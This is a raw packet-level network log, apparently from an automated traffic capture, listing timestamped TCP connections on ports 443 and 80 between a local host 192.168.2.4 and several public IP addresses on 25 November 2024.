                                                    Nov 25, 2024 19:44:50.597944975 CET49821443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:50.597959995 CET4434982135.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:50.729338884 CET4434981335.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:50.729547977 CET4434981335.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:50.729613066 CET49813443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:50.729688883 CET49813443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:50.729688883 CET49813443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:50.729717970 CET4434981335.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:50.729760885 CET49813443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:50.730386019 CET49822443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:50.730412006 CET4434982235.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:50.730526924 CET49822443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:50.730731010 CET49822443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:50.730745077 CET4434982235.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:50.767971992 CET4434981435.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:50.768047094 CET4434981435.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:50.768131018 CET49814443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:50.768194914 CET49814443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:50.768218040 CET4434981435.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:50.768241882 CET49814443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:50.768280029 CET49814443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:50.768585920 CET49823443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:50.768625975 CET4434982335.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:50.768683910 CET49823443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:50.768876076 CET49823443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:50.768892050 CET4434982335.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:50.935039043 CET44349815142.250.181.68192.168.2.4
                                                    Nov 25, 2024 19:44:50.935281992 CET49815443192.168.2.4142.250.181.68
                                                    Nov 25, 2024 19:44:50.935297012 CET44349815142.250.181.68192.168.2.4
                                                    Nov 25, 2024 19:44:50.936424017 CET44349815142.250.181.68192.168.2.4
                                                    Nov 25, 2024 19:44:50.936753988 CET49815443192.168.2.4142.250.181.68
                                                    Nov 25, 2024 19:44:50.936929941 CET44349815142.250.181.68192.168.2.4
                                                    Nov 25, 2024 19:44:50.978982925 CET49815443192.168.2.4142.250.181.68
                                                    Nov 25, 2024 19:44:51.811733961 CET4434982135.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:51.812004089 CET49821443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:51.812022924 CET4434982135.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:51.812350988 CET4434982135.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:51.812798977 CET49821443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:51.812858105 CET4434982135.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:51.812933922 CET49821443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:51.812959909 CET49821443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:51.812966108 CET4434982135.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:51.838979959 CET4434981613.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:51.839546919 CET49816443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:51.839565992 CET4434981613.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:51.840392113 CET49816443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:51.840395927 CET4434981613.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:51.957689047 CET4434982235.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:51.957933903 CET49822443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:51.957946062 CET4434982235.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:51.957979918 CET4434981713.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:51.958291054 CET4434982235.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:51.958349943 CET49817443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:51.958360910 CET4434981713.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:51.958726883 CET49822443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:51.958759069 CET49817443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:51.958765030 CET4434981713.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:51.958794117 CET4434982235.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:51.958885908 CET49822443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:51.958904982 CET49822443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:51.958915949 CET4434982235.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:52.018769979 CET4434981913.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:52.019133091 CET49819443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:52.019146919 CET4434981913.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:52.019535065 CET49819443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:52.019540071 CET4434981913.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:52.020570993 CET4434981813.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:52.020824909 CET49818443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:52.020836115 CET4434981813.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:52.021142006 CET49818443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:52.021146059 CET4434981813.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:52.025165081 CET4434982335.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:52.025376081 CET49823443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:52.025389910 CET4434982335.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:52.025719881 CET4434982335.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:52.026010036 CET49823443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:52.026067972 CET4434982335.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:52.026109934 CET49823443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:52.067353964 CET4434982335.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:52.078969955 CET49823443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:52.213898897 CET4434982013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:52.215487957 CET49820443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:52.215512037 CET4434982013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:52.216613054 CET49820443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:52.216619015 CET4434982013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:52.278805971 CET4434982135.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:52.278963089 CET4434982135.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:52.279027939 CET49821443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:52.279264927 CET49821443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:52.279283047 CET4434982135.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:52.343910933 CET4434981613.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:52.343990088 CET4434981613.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:52.344048023 CET49816443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:52.344275951 CET49816443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:52.344296932 CET4434981613.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:52.344307899 CET49816443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:52.344314098 CET4434981613.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:52.347198009 CET49824443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:52.347223043 CET4434982413.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:52.347302914 CET49824443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:52.347476006 CET49824443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:52.347490072 CET4434982413.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:52.567576885 CET4434981713.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:52.567910910 CET4434981713.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:52.567974091 CET49817443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:52.568037987 CET49817443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:52.568046093 CET4434981713.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:52.568068981 CET49817443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:52.568073988 CET4434981713.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:52.568937063 CET4434981913.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:52.569093943 CET4434981913.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:52.569153070 CET49819443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:52.569186926 CET49819443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:52.569190025 CET4434981913.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:52.569200039 CET49819443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:52.569201946 CET4434981913.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:52.570780993 CET49825443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:52.570799112 CET4434982513.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:52.570871115 CET49825443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:52.570996046 CET49826443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:52.571008921 CET4434982613.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:52.571013927 CET49825443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:52.571026087 CET4434982513.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:52.571063995 CET49826443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:52.571166992 CET49826443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:52.571178913 CET4434982613.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:52.576442957 CET4434981813.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:52.576508999 CET4434981813.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:52.576564074 CET49818443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:52.576663017 CET49818443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:52.576674938 CET4434981813.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:52.576683998 CET49818443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:52.576689005 CET4434981813.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:52.578653097 CET49827443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:52.578660011 CET4434982713.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:52.578727007 CET49827443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:52.578881025 CET49827443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:52.578891993 CET4434982713.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:52.591201067 CET4434982235.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:52.591404915 CET4434982235.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:52.591496944 CET49822443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:52.591535091 CET49822443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:52.591545105 CET4434982235.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:52.591555119 CET49822443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:52.591587067 CET49822443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:52.605356932 CET4434982335.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:52.605448008 CET4434982335.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:52.605531931 CET49823443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:52.605807066 CET49823443192.168.2.435.190.80.1
                                                    Nov 25, 2024 19:44:52.605823040 CET4434982335.190.80.1192.168.2.4
                                                    Nov 25, 2024 19:44:52.705750942 CET4434982013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:52.705951929 CET4434982013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:52.706064939 CET49820443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:52.706095934 CET49820443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:52.706109047 CET4434982013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:52.706123114 CET49820443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:52.706129074 CET4434982013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:52.707933903 CET49828443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:52.707999945 CET4434982813.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:52.708081961 CET49828443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:52.708205938 CET49828443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:52.708236933 CET4434982813.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:54.157488108 CET4434982413.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:54.161431074 CET49824443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:54.161452055 CET4434982413.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:54.161972046 CET49824443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:54.161978006 CET4434982413.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:54.355133057 CET4972480192.168.2.42.20.68.201
                                                    Nov 25, 2024 19:44:54.397629976 CET4434982613.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:54.398279905 CET49826443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:54.398293018 CET4434982613.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:54.398746014 CET49826443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:54.398751020 CET4434982613.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:54.458715916 CET4434982513.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:54.459074974 CET49825443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:54.459093094 CET4434982513.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:54.459462881 CET49825443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:54.459469080 CET4434982513.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:54.459666014 CET4434982713.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:54.459906101 CET49827443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:54.459913015 CET4434982713.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:54.460227966 CET49827443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:54.460232973 CET4434982713.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:54.483860016 CET80497242.20.68.201192.168.2.4
                                                    Nov 25, 2024 19:44:54.483937025 CET4972480192.168.2.42.20.68.201
                                                    Nov 25, 2024 19:44:54.498508930 CET4434982813.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:54.498835087 CET49828443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:54.498866081 CET4434982813.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:54.499191046 CET49828443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:54.499205112 CET4434982813.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:54.635133028 CET4434982413.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:54.635194063 CET4434982413.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:54.635263920 CET49824443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:54.635464907 CET49824443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:54.635474920 CET4434982413.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:54.635484934 CET49824443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:54.635489941 CET4434982413.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:54.638849974 CET49829443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:54.638906956 CET4434982913.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:54.639002085 CET49829443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:54.639166117 CET49829443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:54.639199018 CET4434982913.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:54.851170063 CET4434982613.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:54.851365089 CET4434982613.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:54.851430893 CET49826443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:54.851525068 CET49826443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:54.851531029 CET4434982613.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:54.851542950 CET49826443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:54.851547003 CET4434982613.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:54.854711056 CET49830443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:54.854775906 CET4434983013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:54.854882956 CET49830443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:54.855029106 CET49830443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:54.855058908 CET4434983013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:54.920819044 CET4434982713.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:54.920892954 CET4434982713.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:54.920964956 CET49827443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:54.921109915 CET49827443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:54.921118975 CET4434982713.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:54.921130896 CET49827443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:54.921134949 CET4434982713.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:54.923892021 CET49831443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:54.923929930 CET4434983113.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:54.924026966 CET49831443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:54.924148083 CET49831443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:54.924175024 CET4434983113.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:54.933887959 CET4434982513.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:54.933955908 CET4434982513.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:54.934010029 CET49825443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:54.934096098 CET49825443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:54.934099913 CET4434982513.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:54.934108019 CET49825443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:54.934112072 CET4434982513.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:54.936206102 CET49832443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:54.936249018 CET4434983213.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:54.936321974 CET49832443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:54.936461926 CET49832443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:54.936475039 CET4434983213.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:54.966638088 CET4434982813.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:54.966799974 CET4434982813.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:54.966929913 CET49828443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:54.966976881 CET49828443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:54.966976881 CET49828443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:54.967020035 CET4434982813.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:54.967044115 CET4434982813.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:54.968853951 CET49833443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:54.968879938 CET4434983313.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:54.968949080 CET49833443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:54.969058037 CET49833443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:54.969072104 CET4434983313.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:56.421768904 CET4434982913.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:56.422466040 CET49829443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:56.422518969 CET4434982913.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:56.422919035 CET49829443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:56.422928095 CET4434982913.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:56.699698925 CET4434983013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:56.700277090 CET49830443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:56.700325012 CET4434983013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:56.700774908 CET49830443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:56.700793028 CET4434983013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:56.845288992 CET4434983213.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:56.845665932 CET49832443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:56.845686913 CET4434983213.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:56.846044064 CET49832443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:56.846049070 CET4434983213.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:56.846082926 CET4434983313.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:56.846318960 CET49833443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:56.846354961 CET4434983313.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:56.846652985 CET49833443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:56.846658945 CET4434983313.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:56.867018938 CET4434983113.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:56.867240906 CET49831443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:56.867278099 CET4434983113.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:56.867541075 CET49831443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:56.867552042 CET4434983113.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:56.873219967 CET4434982913.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:56.873287916 CET4434982913.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:56.873342037 CET49829443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:56.873483896 CET49829443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:56.873509884 CET4434982913.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:56.873526096 CET49829443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:56.873533964 CET4434982913.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:56.876302958 CET49834443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:56.876328945 CET4434983413.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:56.876406908 CET49834443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:56.876542091 CET49834443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:56.876552105 CET4434983413.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:57.144197941 CET4434983013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:57.144393921 CET4434983013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:57.144479990 CET49830443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:57.144568920 CET49830443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:57.144606113 CET4434983013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:57.144630909 CET49830443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:57.144644976 CET4434983013.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:57.147713900 CET49835443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:57.147759914 CET4434983513.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:57.147839069 CET49835443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:57.148024082 CET49835443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:57.148037910 CET4434983513.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:57.295864105 CET4434983213.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:57.295948029 CET4434983213.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:57.295999050 CET49832443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:57.296211004 CET49832443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:57.296226978 CET4434983213.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:57.296236992 CET49832443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:57.296241999 CET4434983213.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:57.296516895 CET4434983313.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:57.296685934 CET4434983313.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:57.296742916 CET49833443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:57.296777964 CET49833443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:57.296796083 CET4434983313.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:57.296806097 CET49833443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:57.296813965 CET4434983313.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:57.299468994 CET49836443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:57.299499035 CET4434983613.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:57.299510002 CET49837443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:57.299551010 CET4434983713.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:57.299561024 CET49836443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:57.299599886 CET49837443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:57.299734116 CET49837443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:57.299737930 CET49836443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:57.299748898 CET4434983613.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:57.299755096 CET4434983713.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:57.327936888 CET4434983113.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:57.327996969 CET4434983113.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:57.328171968 CET49831443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:57.329339027 CET49831443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:57.329339027 CET49831443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:57.329363108 CET4434983113.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:57.329375029 CET4434983113.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:57.330584049 CET49838443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:57.330611944 CET4434983813.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:57.330673933 CET49838443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:57.330811024 CET49838443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:57.330821037 CET4434983813.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:58.691628933 CET4434983413.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:58.692316055 CET49834443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:58.692337990 CET4434983413.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:58.692677975 CET49834443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:58.692682028 CET4434983413.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:58.954355955 CET4434983513.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:58.955156088 CET49835443192.168.2.413.107.246.63
                                                    Nov 25, 2024 19:44:58.955184937 CET4434983513.107.246.63192.168.2.4
                                                    Nov 25, 2024 19:44:58.955549955 CET49835443192.168.2.413.107.246.63
